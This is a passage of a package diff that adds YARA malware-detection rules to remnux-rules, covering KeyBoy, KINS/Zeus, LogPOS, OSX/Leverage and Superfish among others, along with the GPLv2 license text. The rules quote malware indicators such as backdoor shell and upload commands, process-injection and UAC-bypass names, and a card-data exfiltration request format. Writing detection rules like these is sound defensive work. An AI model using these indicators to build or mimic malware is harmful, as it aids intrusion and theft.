+        $ = "ECD4FC4D-521C-11D0-B792-00A0C90312E1"
+        $ = "B12AE898-D056-4378-A844-6D393FE37956"
+        
+    condition:
+       any of them
+}
+
+rule Insta11 : Family
+{
+    meta:
+        description = "Insta11"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+        
+    condition:
+        Insta11Code or Insta11Strings
+}
diff -Nru remnux-rules-0.0.3/yara.old/Intel_Virtualization.yara remnux-rules-0.0.4/yara.old/Intel_Virtualization.yara
--- remnux-rules-0.0.3/yara.old/Intel_Virtualization.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Intel_Virtualization.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,40 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Intel_Virtualization_Wizard_exe {
+  meta:
+    author = "cabrel@zerklabs.com"
+    description = "Dynamic DLL abuse executable"
+
+    file_1_seen = "2013-05-21"
+    file_1_sha256 = "7787757ae851f4a162f46f794be1532ab78e1928185212bdab83b3106f28c708"
+
+  strings:
+    $a = {4C 6F 61 64 53 54 52 49 4E 47}
+    $b = {49 6E 69 74 69 61 6C 69 7A 65 4B 65 79 48 6F 6F 6B}
+    $c = {46 69 6E 64 52 65 73 6F 75 72 63 65 73}
+    $d = {4C 6F 61 64 53 54 52 49 4E 47 46 72 6F 6D 48 4B 43 55}
+    $e = {68 63 63 75 74 69 6C 73 2E 44 4C 4C}
+  condition:
+    all of them
+}
+
+rule Intel_Virtualization_Wizard_dll {
+  meta:
+    author = "cabrel@zerklabs.com"
+    description = "Dynamic DLL (Malicious)"
+
+    file_1_seen = "2013-05-21"
+    file_1_sha256 = "485ae043b6a5758789f1d33766a26d8b45b9fde09cde0512aa32d4bd1ee04f28"
+
+  strings:
+    $a = {48 3A 5C 46 61 73 74 5C 50 6C 75 67 28 68 6B 63 6D 64 29 5C}
+    $b = {64 6C 6C 5C 52 65 6C 65 61 73 65 5C 48 69 6A 61 63 6B 44 6C 6C 2E 70 64 62}
+
+  condition:
+    ($a and $b) and Intel_Virtualization_Wizard_exe
+}
diff -Nru remnux-rules-0.0.3/yara.old/jRAT.yara remnux-rules-0.0.4/yara.old/jRAT.yara
--- remnux-rules-0.0.3/yara.old/jRAT.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/jRAT.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,23 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+rule jRAT_conf : rat 
+{
+	meta:
+		description = "jRAT configuration" 
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2013-10-11"
+		filetype = "memory"
+		version = "1.0" 
+		ref1 = "https://github.com/MalwareLu/config_extractor/blob/master/config_jRAT.py" 
+		ref2 = "http://www.ghettoforensics.com/2013/10/dumping-malware-configuration-data-from.html" 
+
+	strings:
+		$a = /port=[0-9]{1,5}SPLIT/ 
+
+	condition: 
+		$a
+}
diff -Nru remnux-rules-0.0.3/yara.old/Kelihos.yara remnux-rules-0.0.4/yara.old/Kelihos.yara
--- remnux-rules-0.0.3/yara.old/Kelihos.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Kelihos.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,20 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule KelihosHlux
+{
+  meta:
+	author = "@malpush"
+	maltype = "KelihosHlux"
+	description = "http://malwared.ru"
+	date = "22/02/2014"
+  strings:
+    $KelihosHlux_HexString = { 73 20 7D 8B FE 95 E4 12 4F 3F 99 3F 6E C8 28 26 C2 41 D9 8F C1 6A 72 A6 CE 36 0F 73 DD 2A 72 B0 CC D1 07 8B 2B 98 73 0E 7E 8C 07 DC 6C 71 63 F4 23 27 DD 17 56 AE AB 1E 30 52 E7 54 51 F7 20 ED C7 2D 4B 72 E0 77 8E B4 D2 A8 0D 8D 6A 64 F9 B7 7B 08 70 8D EF F3 9A 77 F6 0D 88 3A 8F BB C8 89 F5 F8 39 36 BA 0E CB 38 40 BF 39 73 F4 01 DC C1 17 BF C1 76 F6 84 8F BD 87 76 BC 7F 85 41 81 BD C6 3F BC 39 BD C0 89 47 3E 92 BD 80 60 9D 89 15 6A C6 B9 89 37 C4 FF 00 3D 45 38 09 CD 29 00 90 BB B6 38 FD 28 9C 01 39 0E F9 30 A9 66 6B 19 C9 F8 4C 3E B1 C7 CB 1B C9 3A 87 3E 8E 74 E7 71 D1 }
+   
+  condition:
+    $KelihosHlux_HexString
+}
diff -Nru remnux-rules-0.0.3/yara.old/KeyBoy.yara remnux-rules-0.0.4/yara.old/KeyBoy.yara
--- remnux-rules-0.0.3/yara.old/KeyBoy.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/KeyBoy.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,46 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule KeyBoy_Dropper  
+{  
+    meta:
+        Author      = "Rapid7 Labs"
+        Date        = "2013/06/07"
+        Description = "Strings inside"
+        Reference   = "https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india"
+
+    strings:
+        $1 = "I am Admin"  
+        $2 = "I am User"  
+        $3 = "Run install success!"  
+        $4 = "Service install success!"  
+        $5 = "Something Error!"  
+        $6 = "Not Configed, Exiting"  
+
+    condition:  
+        all of them  
+}
+
+rule KeyBoy_Backdoor  
+{
+    meta:
+        Author      = "Rapid7 Labs"
+        Date        = "2013/06/07"
+        Description = "Strings inside"
+        Reference   = "https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india"
+
+    strings:  
+        $1 = "$login$"  
+        $2 = "$sysinfo$"  
+        $3 = "$shell$"  
+        $4 = "$fileManager$"  
+        $5 = "$fileDownload$"  
+        $6 = "$fileUpload$"  
+
+    condition:  
+        all of them  
+} 
diff -Nru remnux-rules-0.0.3/yara.old/KINS.yara remnux-rules-0.0.4/yara.old/KINS.yara
--- remnux-rules-0.0.3/yara.old/KINS.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/KINS.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,52 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+rule KINS_dropper {
+	meta:
+		author = "AlienVault Labs aortega@alienvault.com"
+		description = "Match protocol, process injects and windows exploit present in KINS dropper"
+		reference = "http://goo.gl/arPhm3"
+	strings:
+		// Network protocol
+		$n1 = "tid=%d&ta=%s-%x" fullword
+		$n2 = "fid=%d" fullword
+		$n3 = "%[^.].%[^(](%[^)])" fullword
+		// Injects
+		$i0 = "%s [%s %d] 77 %s"
+		$i01 = "Global\\%s%x"
+		$i1 = "Inject::InjectProcessByName()"
+		$i2 = "Inject::CopyImageToProcess()"
+		$i3 = "Inject::InjectProcess()"
+		$i4 = "Inject::InjectImageToProcess()"
+		$i5 = "Drop::InjectStartThread()"
+		// UAC bypass
+		$uac1 = "ExploitMS10_092"
+		$uac2 = "\\globalroot\\systemroot\\system32\\tasks\\" ascii wide
+		$uac3 = "<RunLevel>HighestAvailable</RunLevel>" ascii wide
+	condition:
+		2 of ($n*) and 2 of ($i*) and 2 of ($uac*)
+}
+
+rule KINS_DLL_zeus {
+	meta:
+		author = "AlienVault Labs aortega@alienvault.com"
+		description = "Match default bot in KINS leaked dropper, Zeus"
+		reference = "http://goo.gl/arPhm3"
+	strings:
+		// Network protocol
+		$n1 = "%BOTID%" fullword
+		$n2 = "%opensocks%" fullword
+		$n3 = "%openvnc%" fullword
+		$n4 = /Global\\(s|v)_ev/ fullword
+		// Crypted strings
+		$s1 = "\x72\x6E\x6D\x2C\x36\x7D\x76\x77"
+		$s2 = "\x18\x04\x0F\x12\x16\x0A\x1E\x08\x5B\x11\x0F\x13"
+		$s3 = "\x39\x1F\x01\x07\x15\x19\x1A\x33\x19\x0D\x1F"
+		$s4 = "\x62\x6F\x71\x78\x63\x61\x7F\x69\x2D\x67\x79\x65"
+		$s5 = "\x6F\x69\x7F\x6B\x61\x53\x6A\x7C\x73\x6F\x71"
+	condition:
+		all of ($n*) and 1 of ($s*)
+}
diff -Nru remnux-rules-0.0.3/yara.old/Lenovo_superfish.yara remnux-rules-0.0.4/yara.old/Lenovo_superfish.yara
--- remnux-rules-0.0.3/yara.old/Lenovo_superfish.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Lenovo_superfish.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,29 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+/* LENOVO Superfish -------------------------------------------------------- */
+
+rule VisualDiscovery_Lonovo_Superfish_SSL_Hijack {
+	meta:
+		description = "Lenovo Superfish SSL Interceptor - file VisualDiscovery.exe"
+		author = "Florian Roth / improved by kbandla"
+		reference = "https://twitter.com/4nc4p/status/568325493558272000"
+		date = "2015/02/19"
+		hash1 = "99af9cfc7ab47f847103b5497b746407dc566963"
+		hash2 = "f0b0cd0227ba302ac9ab4f30d837422c7ae66c46"
+		hash3 = "f12edf2598d8f0732009c5cd1df5d2c559455a0b"
+		hash4 = "343af97d47582c8150d63cbced601113b14fcca6"
+	strings:
+		$mz = { 4d 5a }
+		//$s1 = "VisualDiscovery.exe" fullword wide
+		$s2 = "Invalid key length used to initialize BlowFish." fullword ascii
+		$s3 = "GetPCProxyHandler" fullword ascii
+		$s4 = "StartPCProxy" fullword ascii
+		$s5 = "SetPCProxyHandler" fullword ascii
+	condition:
+		( $mz at 0 ) and filesize < 2MB and all of ($s*)
+}
diff -Nru remnux-rules-0.0.3/yara.old/Leverage.yara remnux-rules-0.0.4/yara.old/Leverage.yara
--- remnux-rules-0.0.3/yara.old/Leverage.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Leverage.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,25 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule leverage_a
+{
+	meta:
+		author = "earada@alienvault.com"
+		version = "1.0"
+		description = "OSX/Leverage.A"
+		date = "2013/09"
+	strings:
+		$a1 = "ioreg -l | grep \"IOPlatformSerialNumber\" | awk -F"
+		$a2 = "+:Users:Shared:UserEvent.app:Contents:MacOS:"
+		$a3 = "rm '/Users/Shared/UserEvent.app/Contents/Resources/UserEvent.icns'"
+		$script1 = "osascript -e 'tell application \"System Events\" to get the hidden of every login item'"
+		$script2 = "osascript -e 'tell application \"System Events\" to get the name of every login item'"
+		$script3 = "osascript -e 'tell application \"System Events\" to get the path of every login item'"
+		$properties = "serverVisible \x00"
+	condition:
+		all of them
+}
diff -Nru remnux-rules-0.0.3/yara.old/LICENSE remnux-rules-0.0.4/yara.old/LICENSE
--- remnux-rules-0.0.3/yara.old/LICENSE	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/LICENSE	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,340 @@
+                    GNU GENERAL PUBLIC LICENSE
+                       Version 2, June 1991
+
+ Copyright (C) 1989, 1991 Free Software Foundation, Inc., <http://fsf.org/>
+ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+                            Preamble
+
+  The licenses for most software are designed to take away your
+freedom to share and change it.  By contrast, the GNU General Public
+License is intended to guarantee your freedom to share and change free
+software--to make sure the software is free for all its users.  This
+General Public License applies to most of the Free Software
+Foundation's software and to any other program whose authors commit to
+using it.  (Some other Free Software Foundation software is covered by
+the GNU Lesser General Public License instead.)  You can apply it to
+your programs, too.
+
+  When we speak of free software, we are referring to freedom, not
+price.  Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+this service if you wish), that you receive source code or can get it
+if you want it, that you can change the software or use pieces of it
+in new free programs; and that you know you can do these things.
+
+  To protect your rights, we need to make restrictions that forbid
+anyone to deny you these rights or to ask you to surrender the rights.
+These restrictions translate to certain responsibilities for you if you
+distribute copies of the software, or if you modify it.
+
+  For example, if you distribute copies of such a program, whether
+gratis or for a fee, you must give the recipients all the rights that
+you have.  You must make sure that they, too, receive or can get the
+source code.  And you must show them these terms so they know their
+rights.
+
+  We protect your rights with two steps: (1) copyright the software, and
+(2) offer you this license which gives you legal permission to copy,
+distribute and/or modify the software.
+
+  Also, for each author's protection and ours, we want to make certain
+that everyone understands that there is no warranty for this free
+software.  If the software is modified by someone else and passed on, we
+want its recipients to know that what they have is not the original, so
+that any problems introduced by others will not reflect on the original
+authors' reputations.
+
+  Finally, any free program is threatened constantly by software
+patents.  We wish to avoid the danger that redistributors of a free
+program will individually obtain patent licenses, in effect making the
+program proprietary.  To prevent this, we have made it clear that any
+patent must be licensed for everyone's free use or not licensed at all.
+
+  The precise terms and conditions for copying, distribution and
+modification follow.
+
+                    GNU GENERAL PUBLIC LICENSE
+   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
+
+  0. This License applies to any program or other work which contains
+a notice placed by the copyright holder saying it may be distributed
+under the terms of this General Public License.  The "Program", below,
+refers to any such program or work, and a "work based on the Program"
+means either the Program or any derivative work under copyright law:
+that is to say, a work containing the Program or a portion of it,
+either verbatim or with modifications and/or translated into another
+language.  (Hereinafter, translation is included without limitation in
+the term "modification".)  Each licensee is addressed as "you".
+
+Activities other than copying, distribution and modification are not
+covered by this License; they are outside its scope.  The act of
+running the Program is not restricted, and the output from the Program
+is covered only if its contents constitute a work based on the
+Program (independent of having been made by running the Program).
+Whether that is true depends on what the Program does.
+
+  1. You may copy and distribute verbatim copies of the Program's
+source code as you receive it, in any medium, provided that you
+conspicuously and appropriately publish on each copy an appropriate
+copyright notice and disclaimer of warranty; keep intact all the
+notices that refer to this License and to the absence of any warranty;
+and give any other recipients of the Program a copy of this License
+along with the Program.
+
+You may charge a fee for the physical act of transferring a copy, and
+you may at your option offer warranty protection in exchange for a fee.
+
+  2. You may modify your copy or copies of the Program or any portion
+of it, thus forming a work based on the Program, and copy and
+distribute such modifications or work under the terms of Section 1
+above, provided that you also meet all of these conditions:
+
+    a) You must cause the modified files to carry prominent notices
+    stating that you changed the files and the date of any change.
+
+    b) You must cause any work that you distribute or publish, that in
+    whole or in part contains or is derived from the Program or any
+    part thereof, to be licensed as a whole at no charge to all third
+    parties under the terms of this License.
+
+    c) If the modified program normally reads commands interactively
+    when run, you must cause it, when started running for such
+    interactive use in the most ordinary way, to print or display an
+    announcement including an appropriate copyright notice and a
+    notice that there is no warranty (or else, saying that you provide
+    a warranty) and that users may redistribute the program under
+    these conditions, and telling the user how to view a copy of this
+    License.  (Exception: if the Program itself is interactive but
+    does not normally print such an announcement, your work based on
+    the Program is not required to print an announcement.)
+
+These requirements apply to the modified work as a whole.  If
+identifiable sections of that work are not derived from the Program,
+and can be reasonably considered independent and separate works in
+themselves, then this License, and its terms, do not apply to those
+sections when you distribute them as separate works.  But when you
+distribute the same sections as part of a whole which is a work based
+on the Program, the distribution of the whole must be on the terms of
+this License, whose permissions for other licensees extend to the
+entire whole, and thus to each and every part regardless of who wrote it.
+
+Thus, it is not the intent of this section to claim rights or contest
+your rights to work written entirely by you; rather, the intent is to
+exercise the right to control the distribution of derivative or
+collective works based on the Program.
+
+In addition, mere aggregation of another work not based on the Program
+with the Program (or with a work based on the Program) on a volume of
+a storage or distribution medium does not bring the other work under
+the scope of this License.
+
+  3. You may copy and distribute the Program (or a work based on it,
+under Section 2) in object code or executable form under the terms of
+Sections 1 and 2 above provided that you also do one of the following:
+
+    a) Accompany it with the complete corresponding machine-readable
+    source code, which must be distributed under the terms of Sections
+    1 and 2 above on a medium customarily used for software interchange; or,
+
+    b) Accompany it with a written offer, valid for at least three
+    years, to give any third party, for a charge no more than your
+    cost of physically performing source distribution, a complete
+    machine-readable copy of the corresponding source code, to be
+    distributed under the terms of Sections 1 and 2 above on a medium
+    customarily used for software interchange; or,
+
+    c) Accompany it with the information you received as to the offer
+    to distribute corresponding source code.  (This alternative is
+    allowed only for noncommercial distribution and only if you
+    received the program in object code or executable form with such
+    an offer, in accord with Subsection b above.)
+
+The source code for a work means the preferred form of the work for
+making modifications to it.  For an executable work, complete source
+code means all the source code for all modules it contains, plus any
+associated interface definition files, plus the scripts used to
+control compilation and installation of the executable.  However, as a
+special exception, the source code distributed need not include
+anything that is normally distributed (in either source or binary
+form) with the major components (compiler, kernel, and so on) of the
+operating system on which the executable runs, unless that component
+itself accompanies the executable.
+
+If distribution of executable or object code is made by offering
+access to copy from a designated place, then offering equivalent
+access to copy the source code from the same place counts as
+distribution of the source code, even though third parties are not
+compelled to copy the source along with the object code.
+
+  4. You may not copy, modify, sublicense, or distribute the Program
+except as expressly provided under this License.  Any attempt
+otherwise to copy, modify, sublicense or distribute the Program is
+void, and will automatically terminate your rights under this License.
+However, parties who have received copies, or rights, from you under
+this License will not have their licenses terminated so long as such
+parties remain in full compliance.
+
+  5. You are not required to accept this License, since you have not
+signed it.  However, nothing else grants you permission to modify or
+distribute the Program or its derivative works.  These actions are
+prohibited by law if you do not accept this License.  Therefore, by
+modifying or distributing the Program (or any work based on the
+Program), you indicate your acceptance of this License to do so, and
+all its terms and conditions for copying, distributing or modifying
+the Program or works based on it.
+
+  6. Each time you redistribute the Program (or any work based on the
+Program), the recipient automatically receives a license from the
+original licensor to copy, distribute or modify the Program subject to
+these terms and conditions.  You may not impose any further
+restrictions on the recipients' exercise of the rights granted herein.
+You are not responsible for enforcing compliance by third parties to
+this License.
+
+  7. If, as a consequence of a court judgment or allegation of patent
+infringement or for any other reason (not limited to patent issues),
+conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License.  If you cannot
+distribute so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you
+may not distribute the Program at all.  For example, if a patent
+license would not permit royalty-free redistribution of the Program by
+all those who receive copies directly or indirectly through you, then
+the only way you could satisfy both it and this License would be to
+refrain entirely from distribution of the Program.
+
+If any portion of this section is held invalid or unenforceable under
+any particular circumstance, the balance of the section is intended to
+apply and the section as a whole is intended to apply in other
+circumstances.
+
+It is not the purpose of this section to induce you to infringe any
+patents or other property right claims or to contest validity of any
+such claims; this section has the sole purpose of protecting the
+integrity of the free software distribution system, which is
+implemented by public license practices.  Many people have made
+generous contributions to the wide range of software distributed
+through that system in reliance on consistent application of that
+system; it is up to the author/donor to decide if he or she is willing
+to distribute software through any other system and a licensee cannot
+impose that choice.
+
+This section is intended to make thoroughly clear what is believed to
+be a consequence of the rest of this License.
+
+  8. If the distribution and/or use of the Program is restricted in
+certain countries either by patents or by copyrighted interfaces, the
+original copyright holder who places the Program under this License
+may add an explicit geographical distribution limitation excluding
+those countries, so that distribution is permitted only in or among
+countries not thus excluded.  In such case, this License incorporates
+the limitation as if written in the body of this License.
+
+  9. The Free Software Foundation may publish revised and/or new versions
+of the General Public License from time to time.  Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+Each version is given a distinguishing version number.  If the Program
+specifies a version number of this License which applies to it and "any
+later version", you have the option of following the terms and conditions
+either of that version or of any later version published by the Free
+Software Foundation.  If the Program does not specify a version number of
+this License, you may choose any version ever published by the Free Software
+Foundation.
+
+  10. If you wish to incorporate parts of the Program into other free
+programs whose distribution conditions are different, write to the author
+to ask for permission.  For software which is copyrighted by the Free
+Software Foundation, write to the Free Software Foundation; we sometimes
+make exceptions for this.  Our decision will be guided by the two goals
+of preserving the free status of all derivatives of our free software and
+of promoting the sharing and reuse of software generally.
+
+                            NO WARRANTY
+
+  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
+FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
+OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
+PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
+OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
+TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
+PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
+REPAIR OR CORRECTION.
+
+  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
+REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
+INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
+OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
+TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
+YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
+PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
+POSSIBILITY OF SUCH DAMAGES.
+
+                     END OF TERMS AND CONDITIONS
+
+            How to Apply These Terms to Your New Programs
+
+  If you develop a new program, and you want it to be of the greatest
+possible use to the public, the best way to achieve this is to make it
+free software which everyone can redistribute and change under these terms.
+
+  To do so, attach the following notices to the program.  It is safest
+to attach them to the start of each source file to most effectively
+convey the exclusion of warranty; and each file should have at least
+the "copyright" line and a pointer to where the full notice is found.
+
+    {description}
+    Copyright (C) {year}  {fullname}
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License along
+    with this program; if not, write to the Free Software Foundation, Inc.,
+    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+
+Also add information on how to contact you by electronic and paper mail.
+
+If the program is interactive, make it output a short notice like this
+when it starts in an interactive mode:
+
+    Gnomovision version 69, Copyright (C) year name of author
+    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
+    This is free software, and you are welcome to redistribute it
+    under certain conditions; type `show c' for details.
+
+The hypothetical commands `show w' and `show c' should show the appropriate
+parts of the General Public License.  Of course, the commands you use may
+be called something other than `show w' and `show c'; they could even be
+mouse-clicks or menu items--whatever suits your program.
+
+You should also get your employer (if you work as a programmer) or your
+school, if any, to sign a "copyright disclaimer" for the program, if
+necessary.  Here is a sample; alter the names:
+
+  Yoyodyne, Inc., hereby disclaims all copyright interest in the program
+  `Gnomovision' (which makes passes at compilers) written by James Hacker.
+
+  {signature of Ty Coon}, 1 April 1989
+  Ty Coon, President of Vice
+
+This General Public License does not permit incorporating your program into
+proprietary programs.  If your program is a subroutine library, you may
+consider it more useful to permit linking proprietary applications with the
+library.  If this is what you want to do, use the GNU Lesser General
+Public License instead of this License.
+
diff -Nru remnux-rules-0.0.3/yara.old/LogPOS.yara remnux-rules-0.0.4/yara.old/LogPOS.yara
--- remnux-rules-0.0.3/yara.old/LogPOS.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/LogPOS.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,23 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+rule LogPOS
+{
+    meta:
+        author = "Morphick Security"
+        description = "Detects Versions of LogPOS"
+        md5 = "af13e7583ed1b27c4ae219e344a37e2b"
+    strings:
+        $mailslot = "\\\\.\\mailslot\\LogCC"
+        $get = "GET /%s?encoding=%c&t=%c&cc=%I64d&process="
+        //64A130000000      mov eax, dword ptr fs:[0x30]
+        //8B400C        mov eax, dword ptr [eax + 0xc]
+        //8B401C        mov eax, dword ptr [eax + 0x1c]
+        //8B4008        mov eax, dword ptr [eax + 8]
+        $sc = {64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 }
+    condition:
+        $sc and 1 of ($mailslot,$get)
+}
diff -Nru remnux-rules-0.0.3/yara.old/LostDoor.yara remnux-rules-0.0.4/yara.old/LostDoor.yara
--- remnux-rules-0.0.3/yara.old/LostDoor.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/LostDoor.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,20 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule lost_door : Trojan
+{
+	meta:
+		author="Kevin Falcoz"
+		date="23/02/2013"
+		description="Lost Door"
+	
+	strings:
+		$signature1={45 44 49 54 5F 53 45 52 56 45 52} /*EDIT_SERVER*/
+		
+	condition:
+		$signature1
+}
diff -Nru remnux-rules-0.0.3/yara.old/LuckyCat.yara remnux-rules-0.0.4/yara.old/LuckyCat.yara
--- remnux-rules-0.0.3/yara.old/LuckyCat.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/LuckyCat.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,22 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule LuckyCatCode : LuckyCat Family 
+{
+    meta:
+        description = "LuckyCat code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        $xordecrypt = { BF 0F 00 00 00 F7 F7 ?? ?? ?? ?? 32 14 39 80 F2 7B }
+        $dll = { C6 ?? ?? ?? 64 C6 ?? ?? ?? 6C C6 ?? ?? ?? 6C }
+        $commonletters = { B? 63 B? 61 B? 73 B? 65 }
+        
+    condition:
+        $xordecrypt or ($dll and $commonletters)
+}
diff -Nru remnux-rules-0.0.3/yara.old/LURK0.yara remnux-rules-0.0.4/yara.old/LURK0.yara
--- remnux-rules-0.0.3/yara.old/LURK0.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/LURK0.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,96 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule LURK0Header : Family LURK0 {
+	meta:
+		description = "5 char code for LURK0"
+		author = "Katie Kleemola"
+		last_updated = "07-21-2014"
+	
+	strings:
+		$ = { C6 [5] 4C C6 [5] 55 C6 [5] 52 C6 [5] 4B C6 [5] 30 }
+
+	condition:
+		any of them
+}
+
+rule CCTV0Header : Family CCTV0 {
+        meta:  
+		description = "5 char code for LURK0"
+		author = "Katie Kleemola"
+		last_updated = "07-21-2014"
+
+	strings:
+		//if its just one char a time
+		$ = { C6 [5] 43 C6 [5] 43 C6 [5] 54 C6 [5] 56 C6 [5] 30 }
+		// bit hacky but for when samples dont just simply mov 1 char at a time
+		$ = { B0 43 88 [3] 88 [3] C6 [3] 54 C6 [3] 56 [0-12] (B0 30 | C6 [3] 30) }
+
+	condition:
+		any of them
+}
+
+rule SharedStrings : Family {
+	meta:
+		description = "Internal names found in LURK0/CCTV0 samples"
+		author = "Katie Kleemola"
+		last_updated = "07-22-2014"
+	
+	strings:
+		// internal names
+		$i1 = "Butterfly.dll"
+		$i2 = /\\BT[0-9.]+\\ButterFlyDLL\\/
+		$i3 = "ETClientDLL"
+
+		// dbx
+		$d1 = "\\DbxUpdateET\\" wide
+		$d2 = "\\DbxUpdateBT\\" wide
+		$d3 = "\\DbxUpdate\\" wide
+		
+		// other folders
+		$mc1 = "\\Micet\\"
+
+		// embedded file names
+		$n1 = "IconCacheEt.dat" wide
+		$n2 = "IconConfigEt.dat" wide
+
+		$m1 = "\x00\x00ERXXXXXXX\x00\x00" wide
+		$m2 = "\x00\x00111\x00\x00" wide
+		$m3 = "\x00\x00ETUN\x00\x00" wide
+		$m4 = "\x00\x00ER\x00\x00" wide
+
+	condition:
+		any of them //todo: finetune this
+
+}
+
+rule LURK0 : Family LURK0 {
+	
+	meta:
